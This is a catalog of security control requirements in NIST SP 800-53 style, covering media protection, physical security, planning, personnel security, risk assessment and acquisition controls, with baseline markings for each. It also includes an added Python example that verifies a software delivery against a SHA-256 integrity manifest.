The organization develops, disseminates, and reviews/updates [Assignment: organization-defined frequency]: a) A formal, documented media protection policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and b) Formal, documented procedures to facilitate the implementation of the media protection policy and associated media protection controls.

MP-2 Media Access | Baselines: X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization restricts access to [Assignment: organization-defined types of digital and non-digital media] to [Assignment: organization-defined list of authorized individuals] using [Assignment: organization-defined security measures].

MP-2(1) Media Access | Baselines: X X | NSS Stand-Alone: Yes | NSS Network: Yes
The organization employs automated mechanisms to restrict access to media storage areas and to audit access attempts and access granted.
MP-2(2) Media Access | Baselines: X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The information system uses cryptographic mechanisms to protect and restrict access to information on portable digital media.

MP-3 Media Marking | Baselines: X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization: a) Marks, in accordance with organizational policies and procedures, removable information system media and information system output indicating the distribution limitations, handling caveats, and applicable security markings (if any) of the information; and b) Exempts [Assignment: organization-defined list of removable media types] from marking as long as the exempted items remain within [Assignment: organization-defined controlled areas].

MP-4 Media Storage | Baselines: X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization: a) Physically controls and securely stores [Assignment: organization-defined types of digital and non-digital media] within [Assignment: organization-defined controlled areas] using [Assignment: organization-defined security measures]; b) Protects information system media until the media are destroyed or sanitized using approved equipment, techniques, and procedures.

MP-4(1) Media Storage | Baselines: X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
The organization employs cryptographic mechanisms to protect information in storage.

MP-5 Media Transport | Baselines: X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization: a) Protects and controls [Assignment: organization-defined types of digital and non-digital media] during transport outside of controlled areas using [Assignment: organization-defined security measures]; b) Maintains accountability for information system media during transport outside of controlled areas; and c) Restricts the activities associated with transport of such media to authorized personnel.

MP-5(2) Media Transport | Baselines: X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
The organization documents activities associated with the transport of information system media.
MP-5(3) Media Transport X Yes Yes P1
The organization employs an identified custodian throughout the transport of information system media.
MP-5(4) Media Transport X X X X X X Yes Yes P1
The organization employs cryptographic mechanisms to protect the confidentiality and integrity of information stored on digital media during transport outside of controlled areas.
MP-6 Media Sanitization X X X X X X Yes Yes P1
The organization: a) Sanitizes information system media, both digital and non-digital, prior to disposal, release out of organizational control, or release for reuse; and b) Employs sanitization mechanisms with strength and integrity commensurate with the classification or sensitivity of the information.
MP-6(1) Media Sanitization X X X Yes Yes P1
The organization tracks, documents, and verifies media sanitization and disposal actions.
MP-6(2) Media Sanitization X X X X Yes Yes P1
The organization tests sanitization equipment and procedures to verify correct performance [Assignment: organization-defined frequency].
MP-6(3) Media Sanitization X X X X Yes Yes P1
The organization sanitizes portable, removable storage devices prior to connecting such devices to the information system under the following circumstances: [Assignment: organization-defined list of circumstances requiring sanitization of portable, removable storage devices].
MP-6(4) Media Sanitization X X X Yes Yes P1
The organization sanitizes information system media containing Controlled Unclassified Information (CUI) or other sensitive information in accordance with applicable organizational and/or federal standards and policies.
MP-6(5) Media Sanitization X X X Yes Yes P1
The organization sanitizes information system media containing classified information in accordance with NSA standards and policies.
MP-6(6) Media Sanitization X X X Yes Yes P1
The organization destroys information system media that cannot be sanitized.
PE-1 Physical And Environmental Protection Policy And Procedures X X X X X X X X X X X X Yes Yes P1
The organization develops, disseminates, and reviews/updates [Assignment: organization-defined frequency]: a) A formal, documented physical and environmental protection policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and b) Formal, documented procedures to facilitate the implementation of the physical and environmental protection policy and associated physical and environmental protection controls.
PE-2 Physical Access Authorizations X X X X X X X X X X X X Yes Yes P1
The organization: a) Develops and keeps current a list of personnel with authorized access to the facility where the information system resides (except for those areas within the facility officially designated as publicly accessible); b) Issues authorization credentials; c) Reviews and approves the access list and authorization credentials [Assignment: organization-defined frequency], removing from the access list personnel no longer requiring access.
PE-2(1) Physical Access Authorizations X X X X X X X X X Yes Yes P1
The organization authorizes physical access to the facility where the information system resides based on position or role.
PE-2(3) Physical Access Authorizations X X X Yes Yes P1
The organization restricts physical access to the facility containing an information system that processes classified information to authorized personnel with appropriate clearances and access authorizations.
PE-3 Physical Access Control X X X X X X X X X X X X Yes Yes P1
The organization: a) Enforces physical access authorizations for all physical access points (including designated entry/exit points) to the facility where the information system resides (excluding those areas within the facility officially designated as publicly accessible); b) Verifies individual access authorizations before granting access to the facility; c) Controls entry to the facility containing the information system using physical access devices and/or guards; d) Controls access to areas officially designated as publicly accessible in accordance with the organization’s assessment of risk; e) Secures keys, combinations, and other physical access devices; f) Inventories physical access devices [Assignment: organization-defined frequency]; and g) Changes combinations and keys [Assignment: organization-defined frequency] and when keys are lost, combinations are compromised, or individuals are transferred or terminated.
PE-3(1) Physical Access Control X X X Yes Yes P1
The organization enforces physical access authorizations to the information system independent of the physical access controls for the facility.
PE-3(2) Physical Access Control X X X Yes Yes P1
The organization performs security checks at the physical boundary of the facility or information system for unauthorized exfiltration of information or information system components.
PE-3(3) Physical Access Control X X X X X X Yes Yes P1
The organization guards, alarms, and monitors every physical access point to the facility where the information system resides 24 hours per day, 7 days per week.
PE-3(4) Physical Access Control X X Yes Yes P1
The organization uses lockable physical casings to protect [Assignment: organization-defined information system components] from unauthorized physical access.
PE-3(6) Physical Access Control X Yes Yes P1
The organization employs a penetration testing process that includes [Assignment: organization-defined frequency], unannounced attempts to bypass or circumvent security controls associated with physical access points to the facility.
PE-4 Access Control For Transmission Medium X X X X X X No No P1
The organization controls physical access to information system distribution and transmission lines within organizational facilities.
PE-5 Access Control For Output Devices X X X X X Yes Yes P1
The organization controls physical access to information system output devices to prevent unauthorized individuals from obtaining the output.
PE-6 Monitoring Physical Access X X X X X X X X X X X X Yes Yes P1
The organization: a) Monitors physical access to the information system to detect and respond to physical security incidents; b) Reviews physical access logs [Assignment: organization-defined frequency]; and c) Coordinates results of reviews and investigations with the organization’s incident response capability.
PE-6(1) Monitoring Physical Access X X X X Yes Yes P1
The organization monitors real-time physical intrusion alarms and surveillance equipment.
PE-6(2) Monitoring Physical Access X No No P1
The organization employs automated mechanisms to recognize potential intrusions and initiate designated response actions.
PE-7 Visitor Control X X X X X X X X X Yes Yes P1
The organization controls physical access to the information system by authenticating visitors before authorizing access to the facility where the information system resides other than areas designated as publicly accessible.
PE-7(1) Visitor Control X X X X X X X X Yes Yes P1
The organization escorts visitors and monitors visitor activity, when required.
PE-8 Access Records X X X X X X X X X Yes Yes P3
The organization: a) Maintains visitor access records to the facility where the information system resides (except for those areas within the facility officially designated as publicly accessible); and b) Reviews visitor access records [Assignment: organization-defined frequency].
PE-8(1) Access Records X No No P3
The organization employs automated mechanisms to facilitate the maintenance and review of access records.
PE-8(2) Access Records X X Yes Yes P3
The organization maintains a record of all physical access, both visitor and authorized individuals.
PE-9 Power Equipment And Power Cabling X X X X X No No P1
The organization protects power equipment and power cabling for the information system from damage and destruction.
PE-9(2) Power Equipment And Power Cabling X X No Yes P1
The organization employs automatic voltage controls for [Assignment: organization-defined list of critical information system components].
PE-10 Emergency Shutoff X X X X X No No P1
The organization: a) Provides the capability of shutting off power to the information system or individual system components in emergency situations; b) Places emergency shutoff switches or devices in [Assignment: organization-defined location by information system or system component] to facilitate safe and easy access for personnel; and c) Protects emergency power shutoff capability from unauthorized activation.
PE-11 Emergency Power X X X X No No P1
The organization provides a short-term uninterruptible power supply to facilitate an orderly shutdown of the information system in the event of a primary power source loss.
PE-11(1) Emergency Power X X No No P1
The organization provides a long-term alternate power supply for the information system that is capable of maintaining minimally required operational capability in the event of an extended loss of the primary power source.
PE-11(2) Emergency Power X No Yes P1
The organization provides a long-term alternate power supply for the information system that is self-contained and not reliant on external power generation.
PE-12 Emergency Lighting X X X X X X No No P1
The organization employs and maintains automatic emergency lighting for the information system that activates in the event of a power outage or disruption and that covers emergency exits and evacuation routes within the facility.
PE-12(1) Emergency Lighting X X No No P1
The organization provides emergency lighting for all areas within the facility supporting essential missions and business functions.
PE-13 Fire Protection X X X X X X No No P1
The organization employs and maintains fire suppression and detection devices/systems for the information system that are supported by an independent energy source.
PE-13(1) Fire Protection X X X No No P1
The organization employs fire detection devices/systems for the information system that activate automatically and notify the organization and emergency responders in the event of a fire.
PE-13(2) Fire Protection X X X No No P1
The organization employs fire suppression devices/systems for the information system that provide automatic notification of any activation to the organization and emergency responders.
PE-13(3) Fire Protection X X X No No P1
The organization employs an automatic fire suppression capability for the information system when the facility is not staffed on a continuous basis.
PE-13(4) Fire Protection X No Yes P1
The organization ensures that the facility undergoes [Assignment: organization-defined frequency] fire marshal inspections and promptly resolves identified deficiencies.
PE-14 Temperature And Humidity Controls X X X X X X No No P1
The organization: a) Maintains temperature and humidity levels within the facility where the information system resides at [Assignment: organization-defined acceptable levels]; and b) Monitors temperature and humidity levels [Assignment: organization-defined frequency].
PE-14(1) Temperature And Humidity Controls X X No Yes P1
The organization employs automatic temperature and humidity controls in the facility to prevent fluctuations potentially harmful to the information system.
PE-14(2) Temperature And Humidity Controls X X No Yes P1
The organization employs temperature and humidity monitoring that provides an alarm or notification of changes potentially harmful to personnel or equipment.
PE-15 Water Damage Protection X X X X X X No No P1
The organization protects the information system from damage resulting from water leakage by providing master shutoff valves that are accessible, working properly, and known to key personnel.
PE-15(1) Water Damage Protection X No No P1
The organization employs mechanisms that, without the need for manual intervention, protect the information system from water damage in the event of a water leak.
PE-16 Delivery And Removal X X X X X X X X X No No P1
The organization authorizes, monitors, and controls [Assignment: organization-defined types of information system components] entering and exiting the facility and maintains records of those items.
PE-17 Alternate Work Site X X X X X X X X No No P1
The organization: a) Employs [Assignment: organization-defined management, operational, and technical information system security controls] at alternate work sites; b) Assesses as feasible, the effectiveness of security controls at alternate work sites; and c) Provides a means for employees to communicate with information security personnel in case of security incidents or problems.
PE-18 Location Of Information System Components X X
The organization positions information system components within the facility to minimize potential damage from physical and environmental hazards and to minimize the opportunity for unauthorized access.
PE-18(1) Location Of Information System Components X
The organization plans the location or site of the facility where the information system resides with regard to physical and environmental hazards and for existing facilities, considers the physical and environmental hazards in its risk mitigation strategy.
PE-19 Information Leakage X X X X Yes Yes P0
The organization protects the information system from information leakage due to electromagnetic signals emanations.
PE-19(1) Information Leakage X X X X Yes Yes P0
The organization ensures that information system components, associated data communications, and networks are protected in accordance with: (i) national emissions and TEMPEST policies and procedures; and (ii) the sensitivity of the information being transmitted.
PL-1 Security Planning Policy And Procedures X X X X X X X X X X X X Yes Yes P1
The organization develops, disseminates, and reviews/updates [Assignment: organization-defined frequency]: a) A formal, documented security planning policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and b) Formal, documented procedures to facilitate the implementation of the security planning policy and associated security planning controls.
PL-2 System Security Plan X X X X X X X X X X X X Yes Yes P1
The organization: a) Develops a security plan for the information system that: 1) Is consistent with the organization’s enterprise architecture; 2) Explicitly defines the authorization boundary for the system; 3) Describes the operational context of the information system in terms of missions and business processes; 4) Provides the security categorization of the information system including supporting rationale; 5) Describes the operational environment for the information system; 6) Describes relationships with or connections to other information systems; 7) Provides an overview of the security requirements for the system; 8) Describes the security controls in place or planned for meeting those requirements including a rationale for the tailoring and supplementation decisions; and 9) Is reviewed and approved by the authorizing official or designated representative prior to plan implementation; b) Reviews the security plan for the information system [Assignment: organization-defined frequency]; and c) Updates the plan to address changes to the information system/environment of operation or problems identified during plan implementation or security control assessments.
PL-2(1) System Security Plan X X X X X X X X X Yes Yes P1
The organization: a) Develops a security Concept of Operations (CONOPS) for the information system containing, at a minimum: (i) the purpose of the system; (ii) a description of the system architecture; (iii) the security authorization schedule; and (iv) the security categorization and associated factors considered in determining the categorization; and b) Reviews and updates the CONOPS [Assignment: organization-defined frequency].
PL-2(2) System Security Plan X X X X X X X X X Yes Yes P1
The organization develops a functional architecture for the information system that identifies and maintains: a) External interfaces, the information being exchanged across the interfaces, and the protection mechanisms associated with each interface; b) User roles and the access privileges assigned to each role; c) Unique security requirements; d) Types of information processed, stored, or transmitted by the information system and any specific protection needs in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, standards, and guidance; and e) Restoration priority of information or information system services.
PL-4 Rules Of Behavior X X X X X X X X X X X X Yes Yes P1
The organization: a) Establishes and makes readily available to all information system users, the rules that describe their responsibilities and expected behavior with regard to information and information system usage; and b) Receives signed acknowledgment from users indicating that they have read, understand, and agree to abide by the rules of behavior, before authorizing access to information and the information system.
PL-5 Privacy Impact Assessment X X X X X X No No P1
The organization conducts a privacy impact assessment on the information system in accordance with OMB policy.
PL-6 Security-Related Activity Planning X X X X X X X X X X X No No P3
The organization plans and coordinates security-related activities affecting the information system before conducting such activities in order to reduce the impact on organizational operations (i.e., mission, functions, image, and reputation), organizational assets, and individuals.
PS-1 Personnel Security Policy And Procedures X X X X X X X X X X X X Yes Yes P1
The organization develops, disseminates, and reviews/updates [Assignment: organization-defined frequency]: a) A formal, documented personnel security policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and b) Formal, documented procedures to facilitate the implementation of the personnel security policy and associated personnel security controls.
PS-2 Position Categorization X X X X X X X X X X X X Yes Yes P1
The organization: a) Assigns a risk designation to all positions; b) Establishes screening criteria for individuals filling those positions; and c) Reviews and revises position risk designations [Assignment: organization-defined frequency].
PS-3 Personnel Screening X X X X X X X X X Yes Yes P1
The organization: a) Screens individuals prior to authorizing access to the information system; and b) Rescreens individuals according to [Assignment: organization-defined list of conditions requiring rescreening and, where re-screening is so indicated, the frequency of such rescreening].
PS-3(1) Personnel Screening X X X Yes Yes P1
The organization ensures that every user accessing an information system processing, storing, or transmitting classified information is cleared and indoctrinated to the highest classification level of the information on the system.
PS-3(2) Personnel Screening X X X Yes Yes P1
The organization ensures that every user accessing an information system processing, storing, or transmitting types of classified information which require formal indoctrination, is formally indoctrinated for all of the relevant types of information on the system.
PS-4 Personnel Termination X X X X X X X X X X X X Yes Yes P2
The organization, upon termination of individual employment: a) Terminates information system access; b) Conducts exit interviews; c) Retrieves all security-related organizational information system-related property; and d) Retains access to organizational information and information systems formerly controlled by terminated individual.
PS-5 Personnel Transfer X X X X X X X X X X X X Yes Yes P2
The organization reviews logical and physical access authorizations to information systems/facilities when personnel are reassigned or transferred to other positions within the organization and initiates [Assignment: organization-defined transfer or reassignment actions] within [Assignment: organization-defined time period following the formal transfer action].
PS-6 Access Agreements X X X X X X X X X Yes Yes P3
The organization: a) Ensures that individuals requiring access to organizational information and information systems sign appropriate access agreements prior to being granted access; and b) Reviews/updates the access agreements [Assignment: organization-defined frequency].
PS-6(1) Access Agreements X X X X X X Yes Yes P3
The organization ensures that access to information with special protection measures is granted only to individuals who: a) Have a valid access authorization that is demonstrated by assigned official government duties; and b) Satisfy associated personnel security criteria.
PS-6(2) Access Agreements X X X Yes Yes P3
The organization ensures that access to classified information with special protection measures is granted only to individuals who: a) Have a valid access authorization that is demonstrated by assigned official government duties; b) Satisfy associated personnel security criteria; and c) Have read, understand, and signed a nondisclosure agreement.
PS-7 Third-Party Personnel Security X X X X X X X X X Yes Yes P1
The organization: a) Establishes personnel security requirements including security roles and responsibilities for third-party providers; b) Documents personnel security requirements; and c) Monitors provider compliance.
PS-8 Personnel Sanctions X X X X X X X X X X X X Yes Yes P3
The organization employs a formal sanctions process for personnel failing to comply with established information security policies and procedures.
RA-1 Risk Assessment Policy And Procedures X X X X X X X X X X X X Yes Yes P1
The organization develops, disseminates, and reviews/updates [Assignment: organization-defined frequency]: a) A formal, documented risk assessment policy that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and b) Formal, documented procedures to facilitate the implementation of the risk assessment policy and associated risk assessment controls.
RA-2 Security Categorization X X X X X X X X X X X X Yes Yes P1
The organization: a) Categorizes information and the information system in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, standards, and guidance; b) Documents the security categorization results (including supporting rationale) in the security plan for the information system; and c) Ensures the security categorization decision is reviewed and approved by the authorizing official or authorizing official designated representative.
RA-3 Risk Assessment X X X X X X X X X X X X Yes Yes P1
The organization: a) Conducts an assessment of risk, including the likelihood and magnitude of harm, from the unauthorized access, use, disclosure, disruption, modification, or destruction of the information system and the information it processes, stores, or transmits; b) Documents risk assessment results in [Selection: security plan; risk assessment report; [Assignment: organization-defined document]]; c) Reviews risk assessment results [Assignment: organization-defined frequency]; and d) Updates the risk assessment [Assignment: organization-defined frequency] or whenever there are significant changes to the information system or environment of operation (including the identification of new threats and vulnerabilities), or other conditions that may impact the security state of the system.
RA-5 Vulnerability Scanning X X X X X X X X X X X X No No P1
The organization: a) Scans for vulnerabilities in the information system and hosted applications [Assignment: organization-defined frequency and/or randomly in accordance with organization-defined process] and when new vulnerabilities potentially affecting the system/applications are identified and reported; b) Employs vulnerability scanning tools and techniques that promote interoperability among tools and automate parts of the vulnerability management process by using standards for: 1) Enumerating platforms, software flaws, and improper configurations; 2) Formatting and making transparent, checklists and test procedures; and 3) Measuring vulnerability impact; c) Analyzes vulnerability scan reports and results from security control assessments; d) Remediates legitimate vulnerabilities [Assignment: organization-defined response times] in accordance with an organizational assessment of risk; and e) Shares information obtained from the vulnerability scanning process and security control assessments with designated personnel throughout the organization to help eliminate similar vulnerabilities in other information systems (i.e., systemic weaknesses or deficiencies).
RA-5(1) Vulnerability Scanning X X X X X X X X X X X No No P1
The organization employs vulnerability scanning tools that include the capability to readily update the list of information system vulnerabilities scanned.
RA-5(2) Vulnerability Scanning X X X X X X X X X X No No P1
The organization updates the list of information system vulnerabilities scanned [Assignment: organization-defined frequency] or when new vulnerabilities are identified and reported.
RA-5(3) Vulnerability Scanning X
The organization employs vulnerability scanning procedures that can demonstrate the breadth and depth of coverage (i.e., information system components scanned and vulnerabilities checked).
RA-5(4) Vulnerability Scanning X X X X X X X X X X No No P1
The organization attempts to discern what information about the information system is discoverable by adversaries.
RA-5(5) Vulnerability Scanning X X X X X X X X X X No No P1
The organization includes privileged access authorization to [Assignment: organization-identified information system components] for selected vulnerability scanning activities to facilitate more thorough scanning.
RA-5(7) Vulnerability Scanning X X X X X X X X X X No No P1
The organization employs automated mechanisms [Assignment: organization-defined frequency] to detect the presence of unauthorized software on organizational information systems and notify designated organizational officials.
RA-5(9) Vulnerability Scanning X No No P1
The organization employs an independent penetration agent or penetration team to: a) Conduct a vulnerability analysis on the information system; and b) Perform penetration testing on the information system based on the vulnerability analysis to determine the exploitability of identified vulnerabilities.
SA-1  System And Services Acquisition Policy And Procedures
    Baselines: X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
    The organization develops, disseminates, and reviews/updates [Assignment: organization-defined frequency]: a) A formal, documented system and services acquisition policy that includes information security considerations and that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and b) Formal, documented procedures to facilitate the implementation of the system and services acquisition policy and associated system and services acquisition controls.

SA-2  Allocation Of Resources
    Baselines: X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The organization: a) Includes a determination of information security requirements for the information system in mission/business process planning; b) Determines, documents, and allocates the resources required to protect the information system as part of its capital planning and investment control process; and c) Establishes a discrete line item for information security in organizational programming and budgeting documentation.

SA-3  Life Cycle Support
    Baselines: X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
    The organization: a) Manages the information system using a system development life cycle methodology that includes information security considerations; b) Defines and documents information system security roles and responsibilities throughout the system development life cycle; and c) Identifies individuals having information system security roles and responsibilities.
SA-4  Acquisitions
    Baselines: X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The organization includes the following requirements and/or specifications, explicitly or by reference, in information system acquisition contracts based on an assessment of risk and in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, and standards: a) Security functional requirements/specifications; b) Security-related documentation requirements; and c) Developmental and evaluation-related assurance requirements.

SA-4(1)  Acquisitions
    Baselines: X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The organization requires in acquisition documents that vendors/contractors provide information describing the functional properties of the security controls to be employed within the information system, information system components, or information system services in sufficient detail to permit analysis and testing of the controls.

SA-4(2)  Acquisitions
    Baselines: X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The organization requires in acquisition documents that vendors/contractors provide information describing the design and implementation details of the security controls to be employed within the information system, information system components, or information system services (including functional interfaces among control components) in sufficient detail to permit analysis and testing of the controls.

SA-4(3)  Acquisitions
    Baselines: X | NSS Stand-Alone: not marked | NSS Network: not marked | Priority: not marked
    The organization requires software vendors/manufacturers to demonstrate that their software development processes employ state-of-the-practice software and security engineering methods, quality control processes, and validation techniques to minimize flawed or malformed software.
SA-4(4)  Acquisitions
    Baselines: X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The organization ensures that each information system component acquired is explicitly assigned to an information system, and that the owner of the system acknowledges this assignment.

SA-4(5)  Acquisitions
    Baselines: X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The organization requires in acquisition documents that information system components are delivered in a secure, documented configuration, and that the secure configuration is the default configuration for any software reinstalls or upgrades.

SA-4(6)  Acquisitions
    Baselines: X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The organization: a) Employs only government off-the-shelf (GOTS) or commercial off-the-shelf (COTS) information assurance (IA) and IA-enabled information technology products that compose an NSA-approved solution to protect classified information when the networks used to transmit the information are at a lower classification level than the information being transmitted; and b) Ensures that these products have been evaluated and/or validated by the NSA or in accordance with NSA-approved procedures.
SA-5  Information System Documentation
    Baselines: X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P2
    The organization: a) Obtains, protects as required, and makes available to authorized personnel, administrator documentation for the information system that describes: 1) Secure configuration, installation, and operation of the information system; 2) Effective use and maintenance of security features/functions; and 3) Known vulnerabilities regarding configuration and use of administrative (i.e., privileged) functions; and b) Obtains, protects as required, and makes available to authorized personnel, user documentation for the information system that describes: 1) User-accessible security features/functions and how to effectively use those security features/functions; 2) Methods for user interaction with the information system, which enables individuals to use the system in a more secure manner; and 3) User responsibilities in maintaining the security of the information and information system; and c) Documents attempts to obtain information system documentation when such documentation is either unavailable or nonexistent.

SA-5(1)  Information System Documentation
    Baselines: X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P2
    The organization obtains, protects as required, and makes available to authorized personnel, vendor/manufacturer documentation that describes the functional properties of the security controls employed within the information system with sufficient detail to permit analysis and testing.
SA-5(2)  Information System Documentation
    Baselines: X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P2
    The organization obtains, protects as required, and makes available to authorized personnel, vendor/manufacturer documentation that describes the security-relevant external interfaces to the information system with sufficient detail to permit analysis and testing.

SA-5(3)  Information System Documentation
    Baselines: X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P2
    The organization obtains, protects as required, and makes available to authorized personnel, vendor/manufacturer documentation that describes the high-level design of the information system in terms of subsystems and implementation details of the security controls employed within the system with sufficient detail to permit analysis and testing.

SA-5(4)  Information System Documentation
    Baselines: X | NSS Stand-Alone: No | NSS Network: No | Priority: P2
    The organization obtains, protects as required, and makes available to authorized personnel, vendor/manufacturer documentation that describes the low-level design of the information system in terms of modules and implementation details of the security controls employed within the system with sufficient detail to permit analysis and testing.

SA-6  Software Usage Restrictions
    Baselines: X X X X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The organization: a) Uses software and associated documentation in accordance with contract agreements and copyright laws; b) Employs tracking systems for software and associated documentation protected by quantity licenses to control copying and distribution; and c) Controls and documents the use of peer-to-peer file sharing technology to ensure that this capability is not used for the unauthorized distribution, display, performance, or reproduction of copyrighted work.

SA-7  User Installed Software
    Baselines: X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
    The organization enforces explicit rules governing the installation of software by users.
SA-8  Security Engineering Principles
    Baselines: X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
    The organization applies information system security engineering principles in the specification, design, development, implementation, and modification of the information system.

SA-9  External Information System Services
    Baselines: X X X X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The organization: a) Requires that providers of external information system services comply with organizational information security requirements and employ appropriate security controls in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, standards, and guidance; b) Defines and documents government oversight and user roles and responsibilities with regard to external information system services; and c) Monitors security control compliance by external service providers.

SA-9(1)  External Information System Services
    Baselines: X X X | NSS Stand-Alone: No | NSS Network: No | Priority: P1
    The organization: a) Conducts an organizational assessment of risk prior to the acquisition or outsourcing of dedicated information security services; and b) Ensures that the acquisition or outsourcing of dedicated information security services is approved by [Assignment: organization-defined senior organizational official].

SA-10  Developer Configuration Management
    Baselines: X X X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The organization requires that information system developers/integrators: a) Perform configuration management during information system design, development, implementation, and operation; b) Manage and control changes to the information system; c) Implement only organization-approved changes; d) Document approved changes to the information system; and e) Track security flaws and flaw resolution.
SA-10(1)  Developer Configuration Management
    Baselines: X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P1
    The organization requires that information system developers/integrators provide an integrity check of software to facilitate organizational verification of software integrity after delivery.
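SA-10(1) puts the integrity check on the developer and the verification on the receiving organization; the supply chain controls SA-12 and SA-12(2) place that verification in context. The block below is an added example of the receiving side of such a check and is not part of the RMAIP, NIST SP 800-53, or any vendor's deliverable. It assumes a sha256sum-style manifest ("hexdigest  relative/path" per line) shipped with the delivery; the directory layout, file contents and manifest are constructed inline for illustration. Every file under the delivery root is hashed and compared, and unlisted, missing and modified files are all reported rather than stopping at the first failure.

```python
"""Verify a delivered software tree against an integrity manifest (SA-10(1)).
Added example; the manifest format and sample files are constructed here."""
import hashlib
import hmac
import os
import tempfile
from typing import Dict, List

CHUNK = 65536
HEX = set("0123456789abcdef")


def sha256_file(path: str) -> str:
    """Hash in chunks so large deliveries need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def parse_manifest(text: str) -> Dict[str, str]:
    """Parse 'digest  path' lines. Malformed digests and paths that could
    escape the delivery root are errors, not silently skipped entries."""
    entries: Dict[str, str] = {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2 or len(parts[0]) != 64 or not set(parts[0].lower()) <= HEX:
            raise ValueError(f"manifest line {lineno}: malformed entry")
        digest, rel = parts[0].lower(), parts[1].strip()
        if os.path.isabs(rel) or ".." in rel.split("/"):
            raise ValueError(f"manifest line {lineno}: path escapes delivery root")
        entries[rel] = digest
    return entries


def verify_delivery(root: str, manifest_text: str) -> List[str]:
    """Return sorted findings; an empty list means every listed file matched
    and nothing unlisted was present."""
    expected = parse_manifest(manifest_text)
    findings: List[str] = []
    present = set()
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            present.add(rel)
            if rel not in expected:
                findings.append(f"unlisted file: {rel}")
                continue
            # Constant-time compare; cheap, and consistent with how tags are checked elsewhere.
            if not hmac.compare_digest(sha256_file(full), expected[rel]):
                findings.append(f"digest mismatch: {rel}")
    for rel in expected:
        if rel not in present:
            findings.append(f"missing file: {rel}")
    return sorted(findings)


def demo() -> dict:
    """Constructed delivery: two files and a matching manifest, then a
    post-manifest modification of the binary."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        files = {"bin/app": b"#!/bin/sh\necho app v1.0\n", "README": b"release 1.0\n"}
        for rel, data in files.items():
            with open(os.path.join(root, rel), "wb") as f:
                f.write(data)
        manifest = "\n".join(
            f"{hashlib.sha256(data).hexdigest()}  {rel}" for rel, data in files.items()
        )
        results["clean"] = verify_delivery(root, manifest)
        with open(os.path.join(root, "bin/app"), "ab") as f:
            f.write(b"# appended after the manifest was produced\n")
        results["tampered"] = verify_delivery(root, manifest)
    return results


if __name__ == "__main__":
    print(demo())
```

A digest manifest only proves integrity relative to the manifest itself: if an attacker who can alter the delivery can also alter the manifest, both will agree. In practice the manifest has to arrive through a channel the attacker does not control, for example signed by the developer with a key verified out of band (the SC-13(4) digital signature requirement) or fetched separately from the artifact.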
SA-11  Developer Security Testing
    Baselines: X X X X X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P2
    The organization requires that information system developers/integrators, in consultation with associated security personnel (including security engineers): a) Create and implement a security test and evaluation plan; b) Implement a verifiable flaw remediation process to correct weaknesses and deficiencies identified during the security testing and evaluation process; and c) Document the results of the security testing/evaluation and flaw remediation processes.

SA-11(1)  Developer Security Testing
    Baselines: X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P2
    The organization requires that information system developers/integrators employ code analysis tools to examine software for common flaws and document the results of the analysis.

SA-11(2)  Developer Security Testing
    Baselines: X | NSS Stand-Alone: No | NSS Network: Yes | Priority: P2
    The organization requires that information system developers/integrators perform a vulnerability analysis to document vulnerabilities, exploitation potential, and risk mitigations.

SA-12  Supply Chain Protection
    Baselines: X X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
    The organization protects against supply chain threats by employing: [Assignment: organization-defined list of measures to protect against supply chain threats] as part of a comprehensive, defense-in-breadth information security strategy.

SA-12(2)  Supply Chain Protection
    Baselines: X X X X X X X X X | NSS Stand-Alone: Yes | NSS Network: Yes | Priority: P1
    The organization conducts a due diligence review of suppliers prior to entering into contractual agreements to acquire information system hardware, software, firmware, or services.

SA-13  Trustworthiness
